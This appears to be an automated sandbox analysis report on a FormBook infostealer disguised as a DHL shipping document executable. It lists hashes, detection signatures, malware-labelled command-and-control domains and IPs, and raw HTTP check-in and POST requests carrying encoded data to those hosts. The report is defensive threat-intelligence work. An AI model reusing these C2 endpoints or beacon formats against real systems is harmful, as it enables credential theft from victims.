Windows Analysis Report
DHL_SHIPPING_DOCUMENT.exe

Overview

General Information

Sample Name: DHL_SHIPPING_DOCUMENT.exe
Analysis ID: 830431
MD5: 04f5c33c1d3f795872b58f8c3922b49e
SHA1: 3db181379815210d6fb0491d9660ddefff263224
SHA256: c0fee78265aef8793cb49690cc68fdf3debb84ab529bd59a2883a0c63ee0a6f5
Tags: DHL, exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection

Source: DHL_SHIPPING_DOCUMENT.exe ReversingLabs: Detection: 25%
Source: DHL_SHIPPING_DOCUMENT.exe Virustotal: Detection: 39%
Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: http://www.sowmedia.site/d2a3/?F7L99l=8qpwJ&Mw=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAXDnv4xxMA9hLjSw== Avira URL Cloud: Label: malware
Source: http://www.getpay.life/d2a3/?F7L99l=8qpwJ&Mw=VQWJd0zbMmoZh8qz35kMD56sFoyc6gTYso/MZ3BJ/Q0NuTQy4/HeuFqYJgzXZamkeMaLAEsOyVyJpFsiRVW3jp2QSfHijAqmyw== Avira URL Cloud: Label: malware
Source: http://www.363ww.top/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.sowmedia.site Avira URL Cloud: Label: malware
Source: http://www.on-smooth.com/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.luxgudonu.store/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.sowmedia.site/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.rw-bau.com/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.motherhoodinthegarden.com/d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8qmjHtlEGMmc9VxCg==&F7L99l=8qpwJ Avira URL Cloud: Label: malware
Source: http://www.yh78898.com/d2a3/?Mw=/rn7tSorYChcOKKpyJYvjsebDE1EetOtUlfXV6ATVt8jMTNnk8PtnAR6Iam3VdBxJXQPah1uBiYgzGnhkXQp6MgBOVaGh7iMCA==&F7L99l=8qpwJ Avira URL Cloud: Label: malware
Source: http://www.worldhortihealth.com/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.espisys-technology.com/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.getpay.life Avira URL Cloud: Label: malware
Source: http://www.luxgudonu.store/d2a3/?Mw=OjO/noXVMTk40sLqqWNUhETz5fwNQfL3iZv4zuTHX4FsBRg0F7vbWW3nqcxNlOGl4ZCA660VFsqTMG20zBTe2NhxC9mrQabZ6Q==&F7L99l=8qpwJ Avira URL Cloud: Label: malware
Source: http://www.espisys-technology.com/d2a3/?Mw=HRt8t1hC6ylxzqu69JiO+2+wCg/IpDjUJ4ODvXLX3JGoHCx8OnZPShMSZXcaT/6Kc192JGOxG+z3HQLrZrJeLIMi1PhqwEBrHA==&F7L99l=8qpwJ Avira URL Cloud: Label: malware
Source: http://www.motherhoodinthegarden.com/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.versicherungsgott.com/d2a3/ Avira URL Cloud: Label: malware
Source: http://www.yh78898.com/d2a3/ Avira URL Cloud: Label: malware
Source: http://motherhoodinthegarden.com/d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v Avira URL Cloud: Label: malware
Source: http://www.on-smooth.com/d2a3/?F7L99l=8qpwJ&Mw=LnB6L7dnOzftoEr5UpUEPAqnd7gAmYo0E1h8Hr8XDrTV/RCVTRWGXzxgMAjKYD2ZiMi0DXBclY2V/N6w7Ub5K9/YRO3kcEW/Xg== Avira URL Cloud: Label: malware
Source: http://www.versicherungsgott.com/d2a3/?F7L99l=8qpwJ&Mw=3fW4twhu5IX2LSkBcFVlWjxiVco4zHJfqjvATlwHU7q8puaymE5DWsW8adrpP96Z6UNtMOOwQnTRLGoNrAuApIzT11t8CH71vQ== Avira URL Cloud: Label: malware
Source: http://www.getpay.life/d2a3/ Avira URL Cloud: Label: malware
Source: 3.2.eixfhzlwqd.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.eixfhzlwqd.exe.20a0000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: DHL_SHIPPING_DOCUMENT.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: DHL_SHIPPING_DOCUMENT.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: eixfhzlwqd.exe, 00000001.00000003.319488467.000000001A150000.00000004.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000001.00000003.314926280.0000000019FC0000.00000004.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000B1F000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.320016666.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.321428954.000000000086B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.357421969.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002F6F000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: eixfhzlwqd.exe, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000B1F000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.320016666.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.321428954.000000000086B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.357421969.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002F6F000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: help.pdbGCTL source: eixfhzlwqd.exe, 00000003.00000002.357434868.00000000005E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: help.pdb source: eixfhzlwqd.exe, 00000003.00000002.357434868.00000000005E0000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_004089F8 FindFirstFileExW, 1_2_004089F8

Networking

Source: C:\Windows\explorer.exe Network Connect: 50.87.195.203 80
Source: C:\Windows\explorer.exe Network Connect: 37.97.254.29 80
Source: C:\Windows\explorer.exe Domain query: www.getpay.life
Source: C:\Windows\explorer.exe Network Connect: 46.23.69.44 80
Source: C:\Windows\explorer.exe Domain query: www.luxgudonu.store
Source: C:\Windows\explorer.exe Domain query: www.motherhoodinthegarden.com
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.32 80
Source: C:\Windows\explorer.exe Network Connect: 199.192.28.110 80
Source: C:\Windows\explorer.exe Domain query: www.sowmedia.site
Source: C:\Windows\explorer.exe Domain query: www.363ww.top
Source: C:\Windows\explorer.exe Domain query: www.espisys-technology.com
Source: C:\Windows\explorer.exe Domain query: www.on-smooth.com
Source: C:\Windows\explorer.exe Domain query: www.yh78898.com
Source: C:\Windows\explorer.exe Domain query: www.versicherungsgott.com
Source: C:\Windows\explorer.exe Network Connect: 104.233.254.113 80
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.88 80
Source: C:\Windows\explorer.exe Network Connect: 113.52.135.193 80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49695 -> 81.169.145.88:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49695 -> 81.169.145.88:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49695 -> 81.169.145.88:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 199.192.28.110:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 199.192.28.110:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49699 -> 199.192.28.110:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49703 -> 113.52.135.193:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49703 -> 113.52.135.193:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49703 -> 113.52.135.193:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49705 -> 46.23.69.44:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49705 -> 46.23.69.44:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49705 -> 46.23.69.44:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49709 -> 104.233.254.113:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49709 -> 104.233.254.113:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49709 -> 104.233.254.113:80
Source: Traffic Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:60686 -> 8.8.8.8:53
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=3fW4twhu5IX2LSkBcFVlWjxiVco4zHJfqjvATlwHU7q8puaymE5DWsW8adrpP96Z6UNtMOOwQnTRLGoNrAuApIzT11t8CH71vQ== HTTP/1.1
  Host: www.versicherungsgott.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8qmjHtlEGMmc9VxCg==&F7L99l=8qpwJ HTTP/1.1
  Host: www.motherhoodinthegarden.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=VQWJd0zbMmoZh8qz35kMD56sFoyc6gTYso/MZ3BJ/Q0NuTQy4/HeuFqYJgzXZamkeMaLAEsOyVyJpFsiRVW3jp2QSfHijAqmyw== HTTP/1.1
  Host: www.getpay.life
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=HRt8t1hC6ylxzqu69JiO+2+wCg/IpDjUJ4ODvXLX3JGoHCx8OnZPShMSZXcaT/6Kc192JGOxG+z3HQLrZrJeLIMi1PhqwEBrHA==&F7L99l=8qpwJ HTTP/1.1
  Host: www.espisys-technology.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=LnB6L7dnOzftoEr5UpUEPAqnd7gAmYo0E1h8Hr8XDrTV/RCVTRWGXzxgMAjKYD2ZiMi0DXBclY2V/N6w7Ub5K9/YRO3kcEW/Xg== HTTP/1.1
  Host: www.on-smooth.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=OjO/noXVMTk40sLqqWNUhETz5fwNQfL3iZv4zuTHX4FsBRg0F7vbWW3nqcxNlOGl4ZCA660VFsqTMG20zBTe2NhxC9mrQabZ6Q==&F7L99l=8qpwJ HTTP/1.1
  Host: www.luxgudonu.store
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?F7L99l=8qpwJ&Mw=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAXDnv4xxMA9hLjSw== HTTP/1.1
  Host: www.sowmedia.site
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic HTTP traffic detected: GET /d2a3/?Mw=/rn7tSorYChcOKKpyJYvjsebDE1EetOtUlfXV6ATVt8jMTNnk8PtnAR6Iam3VdBxJXQPah1uBiYgzGnhkXQp6MgBOVaGh7iMCA==&F7L99l=8qpwJ HTTP/1.1
  Host: www.yh78898.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: Joe Sandbox View IP Address: 37.97.254.29
Source: global traffic HTTP traffic detected: POST /d2a3/ HTTP/1.1
  Host: www.motherhoodinthegarden.com
  Connection: close
  Content-Length: 184
  Cache-Control: no-cache
  Origin: http://www.motherhoodinthegarden.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.motherhoodinthegarden.com/d2a3/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: Mw=RPRgH48nCcDrQW7x2V4zBrgDd8IPn8vodsoXQxK1YKfM5znrYMxsvH3MWyzqOs8hSlPkC7sHal3dRJaIUtHEwB0dEWUGeoJNE1nNTv7LvQMVN_aLIGb69TaBg09SWpwjc9sSxiNcuZgpfXoNtu48k7RoFKz2mc6rYOhl1vuliHuKAs5i4g).
Source: global traffic HTTP traffic detected: POST /d2a3/ HTTP/1.1
  Host: www.getpay.life
  Connection: close
  Content-Length: 184
  Cache-Control: no-cache
  Origin: http://www.getpay.life
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.getpay.life/d2a3/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: Mw=YS~peDXER2AJuKyloa4FKc6fbYjevTv90eDGeW5S1T48zH4t5pDmv2fcPCOQY5Prfv7vZA9QyCPQjXdmKHCBg-vJUdPhnV6NyhEJjToAozOrjeJRT3xp(R7No-MSGW3dioCbSZ7iRzzPcVAmfhB9CwstvvdnLPbx2R3I1GiguJYv6tBscg).
Source: global traffic HTTP traffic detected: POST /d2a3/ HTTP/1.1
  Host: www.espisys-technology.com
  Connection: close
  Content-Length: 184
  Cache-Control: no-cache
  Origin: http://www.espisys-technology.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.espisys-technology.com/d2a3/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: Mw=KTFcuDNe6BJb9t~3urOU73ivfRCMkR33Ye3Av2nEzb7BQnYib1JOelsxS3gee-zkVHh2dDWwPoDXVQ61G6h5Mvtal7Fr4DthFqueeri4eqd5O5mXyiJ4ffaLyqBVlj(cUKntzBGJMdTG~4Vg~MyP8H12G65cRoX0s_Zoa4imR9d_7lXrog).
Source: global traffic HTTP traffic detected: POST /d2a3/ HTTP/1.1
  Host: www.on-smooth.com
  Connection: close
  Content-Length: 184
  Cache-Control: no-cache
  Origin: http://www.on-smooth.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.on-smooth.com/d2a3/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: Mw=GlpaIO5HCg7nqE~ULrEyDhSmC6ZploMZRgZmM7knDpO7(VOWLS7lSBtlIQe3b3benfKPRgdhodCu7dnWh035Ja6WA-rrYRmzQrJBx8aHAWoAdHeK4YBT91H6dwD3LJXE91Iuy9acZc(HMotyQCt8EkjlOVgq7HnzSJgKVxAwWZkBl2mTaA).
Source: global traffic HTTP traffic detected: POST /d2a3/ HTTP/1.1
  Host: www.luxgudonu.store
  Connection: close
  Content-Length: 184
  Cache-Control: no-cache
  Origin: http://www.luxgudonu.store
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.luxgudonu.store/d2a3/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: Mw=DhmfkeW8GQMI6Yru1yJJm1bQs7sOaeDKjcHpzdymT615bnA2FKa-SnThn9MksPLHwKqTjcBQQLK3CGjXxwPqksJ_Ofz7feHvl2RzfZt3oOvvcgG7ujbH0iNndglsUQR2zC1CSguwb3l-DUTVP0Io(WkSXjhVTgAg75Wq0iK1dK1mUo9ScA).
Source: global traffic HTTP traffic detected: POST /d2a3/ HTTP/1.1
  Host: www.sowmedia.site
  Connection: close
  Content-Length: 184
  Cache-Control: no-cache
  Origin: http://www.sowmedia.site
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.sowmedia.site/d2a3/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: Mw=oKA-glpRC1B794tOaL~6dO7ew-ICO0zakkEMf8eradtH4xKI1G0pdRdA5brsJKijkOeEPNMB9dgcMH1sSEsqDxiX1CsO9VXiYos1wSjP(wYQk_MFrclmSP8nbBFPWLAHwcbpzI4u(byZ4-~gRjJ356P_a3uEeVH8HdRkxVVvsJUImRscAg).
Source: global traffic HTTP traffic detected: POST /d2a3/ HTTP/1.1
  Host: www.yh78898.com
  Connection: close
  Content-Length: 184
  Cache-Control: no-cache
  Origin: http://www.yh78898.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.yh78898.com/d2a3/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Ascii: Mw=ypPbun8uaRZ2Yt2Foosxq_W9WR4BT9arVC(_drwue-Q4S1BF46fzuD07PKrmXOIkC0w1GRozNS1j7jWB(18y36pBDm~qj_K7E09MtPDtmilzbAlUh5GmlB3cTCHYvuCsnWURpAd5aJezs3tBVpP8O5aJaY5LjhU9olvypCe_fYNCW2Te8A).
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Mon, 20 Mar 2023 10:27:41 GMT
  Server: Apache/2.4.56 (Unix)
  Content-Length: 196
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Mon, 20 Mar 2023 10:27:51 GMT
  Server: Apache
  Expires: Wed, 11 Jan 1984 05:00:00 GMT
  Cache-Control: no-cache, must-revalidate, max-age=0
  Upgrade: h2,h2c
  Connection: Upgrade
  Vary: Accept-Encoding
  Content-Encoding: gzip
  host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
  X-Endurance-Cache-Level: 2
  X-nginx-cache: WordPress
  Content-Length: 1037
  Content-Type: text/html; charset=UTF-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Mon, 20 Mar 2023 10:28:10 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html
  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Mon, 20 Mar 2023 10:28:13 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Date: Mon, 20 Mar 2023 10:28:18 GMT
  Server: Apache
  Content-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Content-Type: text/html
  Content-Length: 837
  Connection: close
  Date: Mon, 20 Mar 2023 10:28:21 GMT
  Server: Apache
  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta c
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:28:23 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 32 61 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /d2a3/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:28:26 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 32 61 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /d2a3/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 10:28:34 GMTContent-Type: application/x-www-form-urlencodedContent-Length: 498Connection: closeLast-Modified: Mon, 01 Dec 2014 15:11:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 3c 70 3e 53 6f 72 72 79 2c 20 74 68 69 73 20 69 